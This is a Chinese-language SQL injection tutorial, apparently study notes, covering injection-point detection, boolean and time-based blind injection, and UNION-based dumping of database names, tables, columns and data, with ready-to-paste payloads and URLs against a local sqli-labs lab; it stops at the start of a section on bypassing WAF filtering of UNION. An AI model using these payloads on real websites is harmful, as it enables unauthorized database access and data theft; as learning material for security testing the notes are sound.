一、SQL注入的本质
解释:想要进行sql注入,肯定要发现注入点,一般简单的sql注入通过下面两种方式判断就能发现是否存在sql注入漏洞
1.字符型
注意:字符型注入可能为'
或"
查询语句:
sql
select * from student where id='5';
字符型注入
sql
select * from student where id='' and 1=2 -- ';
分析:上面内容用户输入为' and 1=2 --
,在此语句下and表示并列左右语句都要满足,因为1=2
导致and一定返回false
,所以这条语句肯定不能回显出其正确答案,以此可以判断出是否存在字符型注入 (但这种注入仅限存在回显的情况下,不存在的情况肯定要另加讨论)
注意:字符型注入一般格式如' and 1=2 --
,但是注意在网页当中提交请求中,' and 1=2 --
最后的空格输上会被自动删除,所以要用' and 1=2 --+
(+在url解码后就是表示空格)
特殊情况:
sql
SELECT * FROM course WHERE Cno=(((('4'))));
-- 这种情况简单的字符或者数字注入可能会有一些问题
2.数字型
查询语句:
sql
select * from student where id=5;
数字注入
sql
select * from student where id=1 and 1=2;
分析:上面内容用户输入为1 and 1=2
,在此语句下and表示并列左右语句都要满足,因为1=2
导致and一定返回false
,所以这条语句肯定不能回显出其正确答案,以此可以判断出是否存在数字型注入
(但这种注入仅限存在回显的情况下,不存在的情况肯定要另加讨论)
二、SQL注入测试方法
1.布尔盲注
解释:布尔盲注适用于界面有明显的反应,即数据为显示与不显示两种状态(但是显示与不显示可能并不明显或者说很隐蔽),其实上面介绍字符型注入和数字型注入的时候就用到了
简单例子-查询语句:
sql
select * from student where id='5';
简单例子-字符型注入
sql
select * from student where id='' and 1=2 -- ';
解释:其就是通过and后面的语句来构造,但是要保证and前面的一定要为true,否则后面的内容验证也就失去了意义,注入时也要根据具体情况来构造,比如验证账号密码就不能使用' and 1=2 --+
(因为你可能不知道账号是什么,就是and前面的内容很可能是错的,但是登录需要账号密码都正确,这时用' or 1=1 --+
或许能够有效解决问题)
简单例子-应用实例:
php
//判断是否是 Mysql数据库
http://127.0.0.1/sqli/Less-5/?id=1' and exists(select*from information_schema.tables) --+
//判断是否是 access数据库
http://127.0.0.1/sqli/Less-5/?id=1' and exists(select*from msysobjects) --+
//判断是否是 Sqlserver数据库
http://127.0.0.1/sqli/Less-5/?id=1' and exists(select*from sysobjects) --+
2.时间盲注
解释:时间盲注的意思,在布尔盲注失效,即页面无论怎么样注入都不存在回显的情况下,可能就需要用到时间盲注了,其原理就是,如果存在注入点,就执行睡眠函数,让页面去进行等待,以次去观察页面反应时间,如果页面大概等待了指定时间才返回值可能就存在时间盲注
查询语句:
sql
select * from student where id='5';
字符型注入
sql
select * from student where id='' and sleep(5) -- ';
解释:上诉问题就是在页面没有内容回显的情况下进行的,当存在该注入点的时候,页面会睡眠5秒以上才会响应,这就是证明存在该注入点,可能通过类似此的方法来便利获取服务器的数据
三、SQL暴库方法
前提:此时已经找到了注入点,正在准备执行任意sql命令
1.联合注入
1.1 获取列数
解释:只有我们知道当前的列数,后面才能让我们执行联合查询语句
sql:SELECT * FROM course WHERE Cno='1' ORDER BY 5 -- ';
快速利用:
1' ORDER BY 5 --+'
1' ORDER BY 5 -- '
知识点:如上使用order by
语句,当order by n
中n小于当前表的列数不会报错,大于当前表的列数就会报错,显示在程序页面可能显示为数据消失或者异常
解释:通过发现注入点,想要执行我们的sql语句 就要用到联合注入
简单执行:SELECT * FROM course WHERE Cno='-1' UNION SELECT 1,2,3,4 -- ';
常用函数:
名称 | 功能 |
---|---|
database() | 当前数据库名字 |
user() | 当前用户的名字 |
@@version_compile_os | 操作系统版本 |
@@datadir | 数据库的路径 |
version() | mysql的版本号 |
简单例子:SELECT * FROM course WHERE Cno='-1' UNION SELECT @@datadir,USER(),DATABASE(),@@version_compile_os -- ';
1.2 获取数据
1. 查询数据库有哪些库:
-
解释:当知道了有哪些数据库才能开始从该数据库获取信息
-
构造后语句:
sqlSELECT * FROM course WHERE Cno='-1' UNION SELECT 1,2,3,GROUP_CONCAT(schema_name) FROM information_schema.schemata -- ';
-
GROUP_CONCAT(schema_name)
其相当于把内容显示在一行里面,因为在select里面只有1,2,3,4个位置,如果很多数据,无法按普通命令展示 -
普通命令:
SELECT schema_name FROM information_schema.schemata;
-
原理:
information_schema
的schemata
表里面放着所有数据库信息 -
快速利用:
-1' UNION SELECT 1,2,3,GROUP_CONCAT(schema_name) FROM information_schema.schemata --+'
-1' UNION SELECT 1,2,3,GROUP_CONCAT(schema_name) FROM information_schema.schemata -- '
2. 查询数据库有哪些表:
-
解释:当知道了有哪些表才能开始从该表获取信息
-
构造后语句:
sqlSELECT * FROM course WHERE Cno='-1' UNION SELECT 1,2,3,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() -- ';
-
GROUP_CONCAT(table_name)
其相当于把内容显示在一行里面,因为在select里面只有1,2,3,4个位置,如果很多数据,无法按普通命令展示 -
普通命令:
SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE();
-
原理:
information_schema
的tables
表里面放着所有数据的表单 -
快速利用:
1' UNION SELECT 1,2,3,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() --+'
1' UNION SELECT 1,2,3,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() -- '
3. 查询表里面的字段
-
解释:当知道了表里面有哪些字段才能开始从该表获取信息,当然有人可能说知道表名直接使用
select *
但是由于使用union的联合查询受到诸多限制,这样使用并不现实 -
构造后语句:
sqlSELECT * FROM course WHERE Cno='-1' UNION SELECT 1,2,3,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='course' -- ';
-
GROUP_CONCAT(column_name)
其相当于把内容显示在一行里面,因为在select里面只有1,2,3,4个位置,如果很多数据,无法按普通命令展示 -
普通命令:
SELECT column_name FROM information_schema.columns WHERE table_name='course';
-
原理:
information_schema
的columns
表里面放着所有数据的表单 -
快速利用:
-1' UNION SELECT 1,2,3,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='course' --+'
-1' UNION SELECT 1,2,3,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='course' -- '
4. 查询表里面的数据
构造命令:
sql
SELECT * FROM course WHERE Cno='-1'
UNION SELECT 1,2,3,GROUP_CONCAT(Cname) FROM course -- ';
普通命令:
sql
SELECT Cname FROM course;
2.布尔注入
解释:上面的例子里面已经介绍了布尔盲注的测试方法 ,同时还介绍了联合注入 ,但是可能存在一种情况,对方WAF过滤了union字段,那么我们根本就无法使用联合注入 ,那我们只能使用下面介绍的布尔注入